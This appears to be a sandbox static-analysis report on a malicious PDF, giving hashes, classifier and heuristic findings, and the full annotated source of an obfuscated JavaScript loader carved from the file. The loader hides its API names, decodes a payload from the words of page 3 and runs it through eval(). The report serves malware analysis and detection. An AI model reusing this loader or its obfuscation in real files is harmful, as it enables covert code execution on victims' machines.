PDF static analysis report

Static analysis result for SHA-256 fded1fa511846ef9…

SUSPICIOUS

PDF

6.8 KB Created: 2010-05-14 23:55:05 Authoring application: louopifikiuekila (via Wauozafokjitexe) First seen: 2013-07-30
MD5: c27163aef7d7c55312f8e1c9718dcd12 SHA-1: 368763d350f5953e6839d51857817b01b2e95e83 SHA-256: fded1fa511846ef942f0bab2b7b4a1f4adaf946317e98e2834fd8cd11a001401
46 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file was flagged as malicious by an ML classifier with high confidence. Heuristics indicate the presence of embedded JavaScript, which is a common technique for delivering malicious payloads. The JavaScript stream itself is obfuscated, preventing a detailed analysis of its specific actions, but its presence strongly suggests an intent to execute arbitrary code.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 2

  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0018_000.js pdf-javascript-stream PDF /JS object 18 at offset 0x14F6 1347 bytes
SHA-256: fdc4d03acae8925d862d79eb7345e9422e77c6c973ef5d0353e0690711703fe4
Preview script
First 1,000 lines of the extracted script
/*
 * Extracted PDF /JS stream (object 18): a decoder/loader.  This script builds
 * Acrobat/Reader Doc-object API names ("getPageNumWords", "getPageNthWord",
 * "eval") out of string fragments so they never appear literally, reads every
 * word of one PDF page, turns each word into a single character, and passes
 * the assembled text to eval().  The executed payload is therefore NOT in this
 * stream but in the text content of the page at index nS (3); to recover it,
 * apply the same per-word decoding the loop at the bottom performs.
 */
// substr helper used to assemble names from decoy strings.
function kH(uN,zS,gF){return uN.substr(zS,gF);}
var x=String("eval");
// "le"+"ng"+"th" -> "length"
var n=new String(kH("le2C5",0,2)+kH("sukngsku",3,2)+kH("snq2thsn2q",4,2));
var j=21;                    // XOR key applied to every decoded byte (see kP)
var v="";                    // accumulator for the decoded payload text
var r="%0joF".substr(0,1);   // "%" -- used only by yF, which is never called
var h=907-891;               // 16: radix for parseInt in sH
var f=new String("fr"+"om"+"Ch"+kH("arhCpS",0,2)+"Co"+"de");   // "fromCharCode"
var d=58-57;                 // 1, never referenced
var dA=String;
var uNI=String("cha"+kH("rCokqf",0,3)+"deA"+kH("t6r7x",0,1));  // "charCodeAt" -- used only by uZ, never called
;
var oN=new String("sub"+"str");    // "substr"
var nS=3;                           // index of the page whose words carry the payload
var mN=this;                        // NOTE(review): presumably the Doc object of a document-level Acrobat script -- confirm
var t="getP"+"ageN"+"umWo"+"rds";   // "getPageNumWords"
var vW=68-66;                       // 2: number of trailing characters taken from each word
var yT=kH("getPXIm",0,4)+"ageN"+kH("thWoMfkz",0,4)+"rd";   // "getP"+"ageN"+"thWo"+"rd" -> "getPageNthWord"
var tA="cha"+"rCo"+kH("deA1tR2",0,3)+kH("trHhe",0,1);     // "charCodeAt"; overwritten below, never used
var eT=100-100;                     // 0: loop start index
// Dead code: rQ, zI, uZ and yF are defined but never invoked.  The trailing
// parameters (z,uP,uH,cD) on every function are padding and are never read.
function rQ(yTG,cF,z,uP,uH,cD){return yTG-cF};
function zI(yTG,cF,z,uP,uH,cD){return yTG+cF};
// hG.length - 2: offset of the last two characters of a word.
function qV(hG,z,uP,uH,cD){return hG[n]-vW};
// Decode one two-character hex token: parseInt(vE,16) ^ 21, then String.fromCharCode.
function sH(vE,z,uP,uH,cD){var vE=parseInt(vE,h);vE=kP(vE);vE=hC(dA,f)(vE);return vE}
// Take the last two characters of a word and decode them into one character.
function yR(vE,z,uP,uH,cD){var dW=qV(vE);vE=iL(vE,dW);return sH(vE)};
// hG.substr(vI, 2)
function iL(hG,vI,z,uP,uH,cD){return hG[oN](vI,vW)};
function uZ(fU,vI,z,uP,uH,cD){return fU[uNI](vI)};
function yF(vE,z,uP,uH,cD){return r+vE};
// Property lookup by computed name: hG[nI].
function hC(hG,nI,z,uP,uH,cD){return hG[nI]};
// this.getPageNthWord(3, p): the p-th word of the page at index 3.
function kZ(p,z,uP,uH,cD){return mN[yT](nS,p)};
// XOR with the key 21.
function kP(zQ,oD,z,uP,uH,cD){return zQ^j;};
var zSX=mN[t](nS);                  // this.getPageNumWords(3): how many words to process
function pW(vE,z,uP,uH,cD){v=v+vE}; // append one decoded character to v
var iH=mN[x];                       // this.eval
var tA=mN[tA];                      // this["charCodeAt"] -- looked up, never used
var xK=new dA();                    // new String(), never used
// Word p -> its last two hex characters -> XOR 21 -> one character.
function oNG(p,z,uP,uH,cD){var cX=kZ(p);cX=yR(cX);return cX;}
for(var p=eT;p<zSX;p++){var vO=oNG(p);pW(vO);}
// Execute the reassembled text.  For analysis and detection, the stream alone
// only reveals the decoder; the page-3 word list is where the payload lives.
iH(v);